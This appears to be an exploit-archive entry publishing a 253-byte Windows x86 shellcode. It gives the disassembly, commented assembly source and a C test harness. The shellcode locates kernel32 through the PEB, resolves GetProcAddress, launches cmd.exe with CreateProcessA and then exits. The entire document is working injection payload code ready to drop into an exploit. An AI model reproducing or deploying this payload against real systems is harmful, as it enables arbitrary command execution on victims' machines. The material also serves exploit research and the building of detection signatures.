Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)



EKU-ID: 5787 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-08-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
    # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 15-08-2016
    # Tested On : Windows 7 x86
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   31 db                   xor    %ebx,%ebx
  14:   8b 59 3c                mov    0x3c(%ecx),%ebx
  17:   01 cb                   add    %ecx,%ebx
  19:   8b 5b 78                mov    0x78(%ebx),%ebx
  1c:   01 cb                   add    %ecx,%ebx
  1e:   8b 73 20                mov    0x20(%ebx),%esi
  21:   01 ce                   add    %ecx,%esi
  23:   31 d2                   xor    %edx,%edx
 
00000025 <func>:
  25:   42                      inc    %edx
  26:   ad                      lods   %ds:(%esi),%eax
  27:   01 c8                   add    %ecx,%eax
  29:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2f:   75 f4                   jne    25 <func>
  31:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  38:   75 eb                   jne    25 <func>
  3a:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  41:   75 e2                   jne    25 <func>
  43:   8b 73 1c                mov    0x1c(%ebx),%esi
  46:   01 ce                   add    %ecx,%esi
  48:   8b 14 96                mov    (%esi,%edx,4),%edx
  4b:   01 ca                   add    %ecx,%edx
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 db                   xor    %ebx,%ebx
  53:   68 79 41 41 41          push   $0x41414179
  58:   66 89 5c 24 01          mov    %bx,0x1(%esp)
  5d:   68 65 6d 6f 72          push   $0x726f6d65
  62:   68 65 72 6f 4d          push   $0x4d6f7265
  67:   68 52 74 6c 5a          push   $0x5a6c7452
  6c:   54                      push   %esp
  6d:   51                      push   %ecx
  6e:   ff d2                   call   *%edx
  70:   83 c4 10                add    $0x10,%esp
  73:   31 c9                   xor    %ecx,%ecx
  75:   89 ca                   mov    %ecx,%edx
  77:   b2 54                   mov    $0x54,%dl
  79:   51                      push   %ecx
  7a:   83 ec 54                sub    $0x54,%esp
  7d:   8d 0c 24                lea    (%esp),%ecx
  80:   51                      push   %ecx
  81:   52                      push   %edx
  82:   51                      push   %ecx
  83:   ff d0                   call   *%eax
  85:   59                      pop    %ecx
  86:   31 d2                   xor    %edx,%edx
  88:   68 73 41 42 42          push   $0x42424173
  8d:   66 89 54 24 02          mov    %dx,0x2(%esp)
  92:   68 6f 63 65 73          push   $0x7365636f
  97:   68 74 65 50 72          push   $0x72506574
  9c:   68 43 72 65 61          push   $0x61657243
  a1:   8d 14 24                lea    (%esp),%edx
  a4:   51                      push   %ecx
  a5:   52                      push   %edx
  a6:   57                      push   %edi
  a7:   ff d6                   call   *%esi
  a9:   59                      pop    %ecx
  aa:   83 c4 10                add    $0x10,%esp
  ad:   31 db                   xor    %ebx,%ebx
  af:   68 65 78 65 41          push   $0x41657865
  b4:   88 5c 24 03             mov    %bl,0x3(%esp)
  b8:   68 63 6d 64 2e          push   $0x2e646d63
  bd:   8d 1c 24                lea    (%esp),%ebx
  c0:   31 d2                   xor    %edx,%edx
  c2:   b2 44                   mov    $0x44,%dl
  c4:   89 11                   mov    %edx,(%ecx)
  c6:   8d 51 44                lea    0x44(%ecx),%edx
  c9:   56                      push   %esi
  ca:   31 f6                   xor    %esi,%esi
  cc:   52                      push   %edx
  cd:   51                      push   %ecx
  ce:   56                      push   %esi
  cf:   56                      push   %esi
  d0:   56                      push   %esi
  d1:   56                      push   %esi
  d2:   56                      push   %esi
  d3:   56                      push   %esi
  d4:   53                      push   %ebx
  d5:   56                      push   %esi
  d6:   ff d0                   call   *%eax
  d8:   5e                      pop    %esi
  d9:   83 c4 08                add    $0x8,%esp
  dc:   31 db                   xor    %ebx,%ebx
  de:   68 65 73 73 41          push   $0x41737365
  e3:   88 5c 24 03             mov    %bl,0x3(%esp)
  e7:   68 50 72 6f 63          push   $0x636f7250
  ec:   68 45 78 69 74          push   $0x74697845
  f1:   8d 1c 24                lea    (%esp),%ebx
  f4:   53                      push   %ebx
  f5:   57                      push   %edi
  f6:   ff d6                   call   *%esi
  f8:   31 c9                   xor    %ecx,%ecx
  fa:   51                      push   %ecx
  fb:   ff d0                   call   *%eax
*/
 
 
/*
section .text
    global _start
_start:
 
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
 
 
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
 
;---------------------------------------------
 
xor edx,edx
 
func:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz func
cmp dword [eax+4],'rocA'
jnz func
cmp dword [eax+8],'ddre'
jnz func
 
 
;--------------------------------
 
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
;-------------------------------------
 
mov esi,edx
mov edi,ecx
 
;-------------------------
 
 
xor ebx,ebx
 
 
;finding address of RtlZeroMemory()
 
push 0x41414179
mov [esp+1],word bx
push 0x726f6d65
push 0x4d6f7265
push 0x5a6c7452
 
 
 
push esp
push ecx
 
call edx
 
;------------------------------
add esp,16
;-----------------------------------
 
 
;zero out 84 bytes
 
 
xor ecx,ecx
mov edx,ecx
 
mov dl,84
 
push ecx
 
sub esp,84
 
lea ecx,[esp]
 
push ecx
 
push edx
push ecx
 
call eax
 
 
;----------------------------
 
;finding address of CreateProcessA()
pop ecx
 
xor edx,edx
 
push 0x42424173
mov [esp+2],word dx
push 0x7365636f
push 0x72506574
push 0x61657243
 
lea edx,[esp]
 
push ecx
 
push edx
push edi
 
call esi
 
 
;--------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
 
pop ecx
 
add esp,16
 
xor ebx,ebx
push 0x41657865
mov [esp+3],byte bl
push 0x2e646d63
 
lea ebx,[esp]
 
 
xor edx,edx
mov dl,68
 
mov [ecx],edx
 
lea edx,[ecx+68]
 
 
push esi ;
 
xor esi,esi
 
 
push edx
push ecx
 
push esi
push esi
push esi
push esi
push esi
push esi
 
push ebx
push esi
 
call eax
 
pop esi
 
;-------------------------------------
;finding address of ExitProcess()
 
add esp,8
 
xor ebx,ebx
 
push 0x41737365
mov [esp+3],byte bl
push 0x636f7250
push 0x74697845
 
 
lea ebx,[esp]
 
 
push ebx
push edi
 
call esi
 
xor ecx,ecx
push ecx
call eax
*/
 
 
#include<stdio.h>
#include<string.h>
char shellcode[]=\
 
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
 
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}